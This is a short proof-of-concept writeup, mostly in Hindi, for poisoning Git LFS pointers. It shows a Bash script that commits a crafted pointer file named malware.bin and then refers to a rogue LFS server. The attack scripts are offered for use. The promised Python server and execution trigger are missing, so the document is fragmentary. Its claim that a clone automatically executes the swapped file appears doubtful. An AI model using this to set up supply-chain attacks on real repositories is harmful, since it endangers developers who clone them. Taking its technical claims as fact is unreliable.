
Git LFS पॉइंटर पॉइज़निंग के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें Bash और Python स्क्रिप्ट शामिल हैं जो एक दुर्भावनापूर्ण रिपॉजिटरी बनाती हैं, एक दुष्ट LFS सर्वर का अनुकरण करती हैं, और कोड निष्पादन को ट्रिगर करती हैं।
# create_malicious_repo.sh - Sets up a repo with poisoned LFS pointer
git init
git lfs track "*.bin"
echo "version https://git-lfs.github.com/spec/v1
oid sha256:4142434445464748494a4b4c4d4e4f505152535455565758595a616263646566
size 4" > malware.bin
git add .gitattributes malware.bin
git commit -m "Add LFS file"
एक रिपॉज़िटरी Git LFS का उपयोग करती है लेकिन LFS एंडपॉइंट को पिन नहीं करती या डाउनलोड के बाद ऑब्जेक्ट हैश को सत्यापित नहीं करती। कोई हमलावर जो LFS सर्वर से समझौता करता है (या मैन-इन-द-मिडिल बन सकता है) बड़ी फ़ाइल को दुर्भावनापूर्ण फ़ाइल से बदल सकता है, और क्लोन स्वचालित रूप से उसे डाउनलोड कर उसे निष्पादित कर सकता है।
bash create_malicious_repo.sh
# Then simulate rogue LFS server